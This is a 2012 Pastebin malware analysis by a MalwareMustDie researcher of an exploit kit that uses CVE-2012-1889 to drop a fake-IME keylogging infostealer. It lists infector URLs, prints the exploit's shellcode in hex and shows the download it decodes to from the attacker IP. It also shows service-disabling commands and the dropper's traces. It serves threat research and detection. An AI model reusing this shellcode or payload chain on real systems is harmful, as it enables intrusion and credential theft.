unixfreaxjp

Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan

Sep 29th, 2012
297
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. * * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
  2. ================================
  3. CHINESE FAKE IME INFECTIONS
  4. STARTING FAKE NET SERVICE
  5. STARTING CRYPTER SERVICE
  6. INFO STEALER
  7. Found/analysis:
  8. #MalwareMustDie / @unixfreaxjp
  9. ================================
  10. -----------
  11. Infector IP:
  12. -----------
  13. IP: 222.73.57.117
  14. inetnum: 222.64.0.0 - 222.73.255.255
  15. netname: CHINANET-SH
  16. descr: CHINANET shanghai province network
  17. descr: China Telecom
  18. descr: No1,jin-rong Street
  19. descr: Beijing 100032
  20. country: CN
  21. -----------
  22. Info:
  23. -----------
  24. person: Wu Xiao Li
  25. address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
  26. country: CN
  27. phone: +86-21-63630562
  28. fax-no: +86-21-63630566
  29. e-mail: ip-admin@mail.online.sh.cn
  30. nic-hdl: XI5-AP
  31. mnt-by: MAINT-CHINANET-SH
  32. changed: ip-admin@mail.online.sh.cn 20010510
  33. source: APNIC
  34. -----------
  35. Infector urls:
  36. -----------
  37. h00p://9be14ngfsd.pppdiy.com/jx/xop.html
  38. h00p://9f515lzff3.pppdiy.com/xy/xop.html
  39. h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
  40. h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
  41. h00p://9spxqc71fa.pppdiy.com/jy/xop.html
  42. h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
  43. h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
  44. h00p://s52csz5u47.pppdiy.com/wd/xop.html
  45. h00p://s5c2ouavle.pppdiy.com/ny/xop.html
  46. h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
  47. h00p://74jjdqugds.pppdiy.com/zt/xop.html
  48. h00p://75kay4lxj8.pppdiy.com/jy/xop.html
  49. h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
  50. h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
  51. h00p://rre11swub9.pppdiy.com/yh/xop.html
  52. h00p://436p1bwt5s.pppdiy.com/wd/xop.html
  53. h00p://4a41nvbsst.pppdiy.com/tl/xop.html
  54. h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
  55. h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
  56. h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
  57. h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
  58. h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
  59. h00p://4s2aqluitq.pppdiy.com/yl/xop.html
  60. h00p://52jbsoqe53.pppdiy.com/ah/xop.html
  61. h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
  62. h00p://rldq7secto.pppdiy.com/jy/xop.html
  63. h00p://roapzl6ao6.pppdiy.com/yl/xop.html
  64. h00p://rohws731yt.pppdiy.com/tl/xop.html
  65. h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
  66. h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
  67. h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
  68. h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
  69. h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
  70. h00p://2tvypppa1t.pppdiy.com/jx/xop.html
  71. h00p://2zaco8gjga.pppdiy.com/xy/xop.html
  72. h00p://31fclefhp5.pppdiy.com/jy/xop.html
  73. h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
  74. h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
  75. h00p://rceta3uznz.pppdiy.com/xy/xop.html
  76. h00p://11a1tgjoav.pppdiy.com/wd/xop.html
  77. h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
  78. h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
  79. h00p://r89i2jzv72.pppdiy.com/ah/xop.html
  80. h00p://r8cvnadv11.pppdiy.com/jx/xop.html
  81. h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
  82. h00p://r9mdp167ou.pppdiy.com/xy/xop.html
  83. h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
  84. h00p://q4u427a9d9.pppdiy.com/wl/xop.html
  85. h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
  86. h00p://qfckl9xclm.pppdiy.com/xy/xop.html
  87. h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
  88. h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
  89. h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
  90. h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
  91. h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
  92. h00p://pnj1c3glru.pppdiy.com/wd/xop.html
  93. h00p://pnrks68rrs.pppdiy.com/wd/xop.html
  94. h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
  95. h00p://pcsssued3v.pppdiy.com/tl/xop.html
  96. h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
  97. h00p://p444fcmod8.pppdiy.com/jy/xop.html
  98. h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
  99. h00p://z1v1awk14w.pppdiy.com/zx/xop.html
  100. h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
  101. h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
  102. h00p://x82ndlgusg.pppdiy.com/xy/xop.html
  103. h00p://xgbex2gqur.pppdiy.com/wd/xop.html
  104. h00p://xinfejn8sh.pppdiy.com/yh/xop.html
  105. h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
  106. h00p://yzua8al89b.pppdiy.com/wd/index.ht
  107. h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
  108. h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
  109. h00p://vlbujx6d19.pppdiy.com/xy/xop.html
  110. h00p://vouludav9m.pppdiy.com/wd/xop.html
  111. h00p://vqouin8qdg.pppdiy.com/wd/xop.html
  112. h00p://wjjxh168lj.pppdiy.com/wd/index.ht
  113. h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
  114. h00p://sw29diefib.pppdiy.com/wd/xop.html
  115. h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
  116. h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
  117. h00p://rlcensq6ds.pppdiy.com/wd/xop.html
  118. h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
  119. h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
  120. h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
  121. h00p://pjv68ibarl.pppdiy.com/ah/xop.html
  122. h00p://ow858ymp4d.pppdiy.com/xx/xop.html
  123. h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
  124. h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
  125. h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
  126. h00p://mj3aqytgna.pppdiy.com/wd/xop.html
  127. h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
  128. h00p://lsjq1ic827.pppdiy.com/zt/xop.html
  129. h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
  130. h00p://kltudl7ixd.pppdiy.com/wd/xop.html
  131. h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
  132. h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht
  133. h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
  134. h00p://joez462a36.pppdiy.com/xy/xop.html
  135. h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
  136. h00p://hrwvzspefk.pppdiy.com/my/xop.html
  137. h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
  138. h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
  139. h00p://gzfuswbru9.pppdiy.com/xy/xop.html
  140. h00p://gur1nihj4g.pppdiy.com/wd/xop.html
  141. h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
  142. h00p://fs12vmyw85.pppdiy.com/wd/xop.html
  143. h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
  144. h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
  145. h00p://dfmta9juu5.pppdiy.com/ah/xop.html
  146. h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
  147. h00p://85qcnilv1k.pppdiy.com/my/xop.html
  148. h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht
  149. h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
  150. h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
  151. h00p://zgxx2raoak.pppdiy.com/jx/xop.html
  152. h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
  153. h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
  154. h00p://uc18awkxod.pppdiy.com/my/xop.html
  155. h00p://v2229jswhx.pppdiy.com/wd/xop.html
  156. h00p://pxkxilbpos.pppdiy.com/wm/xop.html
  157. h00p://rakwmwhpve.pppdiy.com/xy/xop.html
  158. h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
  159. h00p://ny5iceirim.pppdiy.com/jx/xop.html
  160. h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
  161. h00p://agz5utxh9u.pppdiy.com/wd/index.ht
  162. h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
  163. h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
  164. h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
  165. h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
  166. h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
  167. h00p://odvn3j955e.pppdiy.com/zx/xop.html
  168. h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
  169. h00p://oixgmmsng1.pppdiy.com/xy/xop.html
  170. h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
  171. h00p://oaicu6zotz.pppdiy.com/zt/xop.html
  172. h00p://oannucq891.pppdiy.com/jx/xop.html
  173. h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
  174. h00p://nkkprh379v.pppdiy.com/wd/index.ht
  175. h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
  176. h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
  177. h00p://mzjqths79w.pppdiy.com/yl/xop.html
  178. h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
  179. h00p://n318aq72eb.pppdiy.com/jy/xop.html
  180. h00p://n3zxb481z3.pppdiy.com/yh/xop.html
  181. h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
  182. h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
  183. h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
  184. h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
  185. h00p://mu5dptjoda.pppdiy.com/xy/xop.html
  186. h00p://msogw56yis.pppdiy.com/xy/xop.html
  187.  
  188. ======================
  189. ANALYSIS
  190. ======================
  191. --02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
  192. => `xop.html'
  193. Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
  194. Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
  195. h00p request sent, awaiting response... 200 OK
  196. Length: 9,950 (9.7K) [text/html]
  197. 02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]
  198.  
  199. -----------------------------
  200.  
  201. [h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
  202. // ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Droped..
  203. <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
  204. <meta content="IE=7" h00p-equiv="X-UA-Compatible"/
  205. ------------shellcode executed------------------
  206.  
  207. 58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 // CVE-2012-1889
  208. 0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd
  209. e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5
  210. b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e
  211. 8f bd bd d5 e8 ce d8 cf e9 36 fb b1 55 03 bc bd
  212. bd 36 55 d7 b8 e4 55 23 bf bd bd 5f 44 d5 d2 d3
  213. bd bd d5 c8 cf d1 d0 e9 42 ab 38 7d c8 ae d5 d2
  214. d3 bd bd d5 c8 cf d1 d0 e9 36 fb b1 55 33 bc bd
  215. bd 36 55 d7 bc e4 55 d3 bf bd bd 5f 44 d5 d1 8e
  216. 8f bd d5 ce d5 d8 d1 e9 36 fb b1 55 d2 bc bd bd
  217. 36 55 d7 bc e4 55 f2 bf bd bd 5f 44 3c 51 bd bc
  218. bd bd 36 61 3c 7e 3d bd bd bd d7 bd d7 a7 ee d7
  219. bd 42 eb e1 8e 7d fd 3d 81 be bd c8 44 7a b9 be
  220. e1 fa 93 d8 7a f9 be b9 c5 d8 bd bd 8e 74 ec ec
  221. ee ea ec 8e 7d 36 fb e5 55 9f bc bd bd 3e 45 bd
  222. 54 1e bd bd bd 2d d7 bd d7 bd d7 be d7 bd d7 bf
  223. d5 bd bd bd 7d ee 36 fb 99 55 bc bc bd bd 34 fb
  224. dd d7 bd ed 42 eb 95 34 fb d9 36 fb dd d7 bd d7
  225. bd d7 bd d7 b9 d7 bd ed 42 eb 91 d7 bd d7 bd d7
  226. bd d5 a2 bd b2 bd ed 42 eb 81 34 fb c5 36 f3 d9
  227. 3d c1 b5 42 09 c9 b1 3d c1 b5 42 bd c9 b8 3d c9
  228. b5 42 09 5f 56 34 3b 3d bd bd bd 7a fb cd bd bd
  229. bd bd 7a fb c9 bd bd bd bd d7 bd d7 bd d7 bd 36
  230. fb dd ed 42 eb 85 36 3b 3d bd bd bd d7 bd 30 f3
  231. c9 ec 42 cb cd ed 42 cb dd 42 eb 8d 42 cb dd 42
  232. eb 89 42 cb c5 42 eb fd 36 46 8e 7d 8e 66 3c 51
  233. bd bf bd bd 36 71 3e 45 e9 c0 b5 34 a1 bc 3e 7d
  234. b9 56 4e 36 71 36 64 3e 7e ad 8e 7d ed ec ee ed
  235. ed ed ed ed ed ea ed ed 42 eb b5 36 c3 e9 55 ad
  236. bc bd bd 55 d8 bd bd bd d5 de cb ca bd d5 ce d5
  237. d9 d2 e9 36 fb b1 55 99 bd bd bd 34 fb 81 d9 1c
  238. b9 bd bd bd 30 1d dd 42 42 42 d7 d8 42 cb 81 36
  239. fb ad 55 b5 bd bd bd 8e 66 ee ee ee ee 42 6d 3d
  240. 85 55 3d 85 54 c8 ac 3c c5 b8 2d 2d 2d 2d c9 b5
  241. 36 42 e8 36 51 30 fd b8 42 5d 55 1b bd bd bd 7e
  242. 55 1d bd bd bd 05 ac bc b9 3d 7f b1 bd 55 2e bd
  243. bd bd 3c 51 bd bc bd bd 36 41 3e 7a b9 7a ba 8f
  244. c9 2c b1 7a fa b9 de 34 6c f2 7a fa b5 1d d8 2a
  245. 76 7a fa b1 ec fd 07 c2 7a fa ad 83 a0 0b 84 7a
  246. fa a9 05 d4 69 a6 7a fa a5 03 c2 db 1d 7a fa a1
  247. 41 14 8a 10 7a fa 9d 25 b7 ad 45 d9 1c 8d bd bd
  248. bd 36 fd b1 36 cd a1 10 36 d5 b5 36 4a d7 b9 e4
  249. 55 e9 bd bd bd 2d 5f 45 d5 8e 8f bd bd d5 e8 ce
  250. d8 cf e9 36 bb 55 e8 42 42 42 36 55 d7 b8 e4 55
  251. 88 bd bd bd 5f 44 8e 42 ea 42 eb b9 56 bf e5 7e
  252. 55 44 42 42 42 e6 7b ba 05 34 e2 bc db 7a fa b8
  253. 42 5d 7e ee 36 61 ee d7 fd d5 bd ad bd bd ea 36
  254. fb 9d 55 a5 42 42 42 e5 7e ec eb 36 c8 81 36 c9
  255. 93 c5 be 48 eb 36 cb 9d be 48 8e 74 f4 fc 10 be
  256. 78 8e 66 b2 03 ad 87 6b c9 b5 7c 76 ba be 67 fd
  257. 56 4c 86 a2 c8 5a e3 36 e3 99 be 60 db 36 b1 f6
  258. 36 e3 a1 be 60 36 b9 36 be 78 16 e3 e4 7e 55 60
  259. 41 42 42 0f 4f 5f 49 84 5f c0 3e 67 f5 c6 80 8f
  260. c9 2c b1 38 62 12 06 de 34 6c f2 ec fd 07 c2 1d
  261. d8 2a 76 a3 19 d9 52 2e 8f 59 29 33 ae b7 11 7f
  262. a4 f6 bc 79 30 a2 c9 ea db b0 42 fe 03 11 66 c0
  263. 4d 18 27 ef 43 1a 67 83 a0 0b 84 05 d4 69 a6 03
  264. c2 db 1d 41 14 8a 10 25 b7 ad 45 3d 6b 12 27 46
  265. ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
  266. 93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
  267. c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
  268. bd bd bd bd bd bd ea ea
  269.  
  270. ↑XOR and found h00p://222.73.57.117/exe/jx.exe // path found;
  271.  
  272.  
  273. -------------------------------
  274. --03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
  275. => `jx.exe'
  276. Connecting to 222.73.57.117:80... connected.
  277. h00p request sent, awaiting response... 200 OK
  278. Length: 48,128 (47K) [application/octet-stream]
  279. ------------------------------------
  280.  
  281. Sections:
  282. UPX0 0x1000 0x7000 0 <<<<<<< PACKED!!
  283. UPX1 0x8000 0xc000 46592 <<<<<<< PACKED!!
  284. UPX2 0x14000 0x1000 512 <<<<<<< PACKED!!
  285.  
  286.  
  287. //unpacking.....
  288. UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
  289. File size Ratio Format Name
  290. ------------------ ------ ----------- -----------
  291. 58880 <- 48128 81.74% win32/pe sample
  292. Unpacked 1 file.
  293.  
  294. -------bin analysis------
  295.  
  296. Fail CRC: Claimed: 0 Actual: 60344
  297. Fail Compile Time: 2033-11-12 07:06:07
  298. Compiler: Microsoft Visual C++ v6.0
  299.  
  300. //strange,,,,
  301. 0x40402c CreateToolhelp32Snapshot
  302. 0x404054 Process32First
  303. 0x404080 Process32Next
  304.  
  305. // Renaming itself....
  306. call sub_40161C
  307. call sub_401693
  308. mov ebx, offset aJx3client_exe ; "JX3Client.exe"
  309.  
  310.  
  311. --------------traces---------
  312.  
  313. // Malware OP traces...
  314.  
  315. 000000002FE6 0000004047E6 0 MoveFileA
  316. 000000003032 000000404832 0 WriteFile
  317. 00000000303E 00000040483E 0 CreateFileA
  318. 00000000304C 00000040484C 0 WinExec
  319. 000000003074 000000404874 0 CopyFileA
  320.  
  321. // keystroke controlling...
  322.  
  323. 0000000030C0 0000004048C0 0 GetKeyboardLayoutList
  324. 0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
  325. 0000000030F2 0000004048F2 0 ActivateKeyboardLayout
  326. 00000000310C 00000040490C 0 GetKeyboardLayout
  327. 000000003120 000000404920 0 LoadKeyboardLayoutA
  328. 000000003136 000000404936 0 UnloadKeyboardLayout
  329.  
  330. // IME Traces...
  331.  
  332. IMM32.dll.ImmGetDescriptionA Hint[0]
  333. IMM32.dll.ImmInstallIMEA Hint[0]
  334. IMM32.dll.ImmIsIME Hint[0]
  335.  
  336. // temp OPS data
  337.  
  338. 00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
  339. 000000003820 000000405220 0 %c:\RECYCLER\%d.tmp
  340.  
  341. // Crypter service..
  342. 00000000E05C 00000040FA5C 0 sc delete cryptsvc
  343. 00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
  344. 00000000E094 00000040FA94 0 net stop cryptsvc
  345.  
  346. //registry added traces
  347.  
  348. 00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
  349. 00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
  350. 00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
  351. 00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
  352. 00000000E134 00000040FB34 0 %sdllcache\%s
  353. 00000000E144 00000040FB44 0 %syu%s //
  354.  
  355.  
  356. //Drops
  357. C:\WINDOWS\system32\chinasougou.ime
  358. C:\WINDOWS\system32\yumidimap.dll
  359. C:\WINDOWS\system32\net1.exe
  360.  
  361.  
  362. //Malwareservice...
  363. Filename: net1.exe
  364. MD5: 3f14c041342e3fba343f2a1d11e74bba
  365. SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
  366. File Size: 124928 Bytes
  367. Command Line: net1 stop cryptsvc
  368.  
  369. //Crypter Service:
  370. Filename: sc.exe
  371. MD5: a48b1c06219a01a60cd8d4d45440bde9
  372. SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
  373. File Size: 31232 Bytes
  374. Command Line: sc config cryptsvc start= disabled
  375.  
  376. ------------------------------------------------------
  377. VIRUS TOTAL CHECKS
  378. -----------------------------------------------------
  379. First Check in VT: (PACKED/ORIGINAL)
  380. https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
  381. McAfee : Artemis!BBFC347F66C1
  382. K7AntiVirus : Riskware
  383. TheHacker : Posible_Worm32
  384. F-Prot : W32/Heuristic-114!Eldorado
  385. ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
  386. TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
  387. Kaspersky : HEUR:Trojan.Win32.Generic
  388. F-Secure : Dropped:Trojan.PWS.FakeIME.B
  389. VIPRE : Trojan.Win32.Generic!BT
  390. AntiVir : TR/ATRAPS.Gen
  391. TrendMicro : TROJ_GEN.RCBCEHF
  392. McAfee-GW-Edition : Artemis!BBFC347F66C1
  393. Jiangmin : Trojan/Generic.algbo
  394. Microsoft : PWS:Win32/Lolyda.BF
  395. Commtouch : W32/Heuristic-114!Eldorado
  396. AhnLab-V3 : Trojan/Win32.Xema
  397. VBA32 : TrojanPSW.QQTen.ng
  398. PCTools : Trojan.Gen
  399. Ikarus : Trojan-PWS.Win32.Lolyda
  400. Fortinet : W32/Onlinegames.QBF!tr
  401. AVG : unknown virus Win32/DH{HhM6SEVn}
  402. Panda : Suspicious file
  403. ---------------------------------------------------------------------
  404. First Check in VT: (UNPACKED)
  405. https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/
  406.  
  407. F-Secure : Dropped:Trojan.PWS.FakeIME.B
  408. DrWeb : BackDoor.PcClient.5930
  409. GData : Dropped:Trojan.PWS.FakeIME.B
  410. Symantec : Suspicious.Cloud.5
  411. Norman : W32/OnLineGames.NVOE
  412. ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
  413. eScan : Dropped:Trojan.PWS.FakeIME.B
  414. Fortinet : W32/Onlinegames.QBF!tr
  415. Emsisoft : Trojan-PWS.Win32.Lolyda!IK
  416. VBA32 : TrojanPSW.QQTen.ng
  417. Kaspersky : HEUR:Trojan.Win32.Generic
  418. Jiangmin : Trojan/Generic.algbo
  419. Rising : Trojan.Win32.Fednu.uhc
  420. Ikarus : Trojan-PWS.Win32.Lolyda
  421. AntiVir : TR/Crypt.ZPACK.Gen
  422. AVG : unknown virus Win32/DH{HhM6SEVn}
  423. Panda : Suspicious file
  424. ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
  425. Comodo : TrojWare.Win32.Poison.QBF
  426.  
  427. INFECTOR: XOP.HTML
  428. https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/
  429.  
  430. eScan : Exploit.CVE-2012-1889.Gen
  431. nProtect : Exploit.CVE-2012-1889.Gen
  432. CAT-QuickHeal : Exploit.CVE.2012.1889
  433. McAfee : Exploit-CVE2012-1889
  434. K7AntiVirus : Exploit
  435. F-Prot : JS/CVE-1889
  436. Norman : ShellCode.AA
  437. TotalDefense : JS/Tnega.VKD
  438. Avast : JS:CVE-2012-1889 [Expl]
  439. eSafe : JS.ShellCode.Aurora
  440. ClamAV : Exploit.CVE_2012_1889-6
  441. Kaspersky : HEUR:Exploit.Script.Generic
  442. BitDefender : Exploit.CVE-2012-1889.Gen
  443. Sophos : Mal/JSShell-B
  444. Comodo : TestSignature.JS.Agent.SH
  445. F-Secure : Exploit:JS/CVE-2012-1889.A
  446. DrWeb : Exploit.CVE2012-1889
  447. VIPRE : Exploit.HTML.CVE-2012-1889 (v)
  448. AntiVir : Exp/JS.Shellcode.H
  449. McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
  450. Emsisoft : Trojan.Script!IK
  451. ESET-NOD32 : JS/Exploit.Shellcode.A.gen
  452. Microsoft : Exploit:JS/ShellCode.AT
  453. GData : Exploit.CVE-2012-1889.Gen
  454. Commtouch : JS/CVE-1889
  455. AhnLab-V3 : JS/Agent
  456. Ikarus : Trojan.Script
  457. AVG : Exploit
  458.  
  459.  
  460. ====================================
  461. MALWARE MUST DIE!!!
  462. #MalwareMustDie
  463. Sept 29 2012 / @unixfreaxjp
  464. ===================================
RAW Paste Data Copied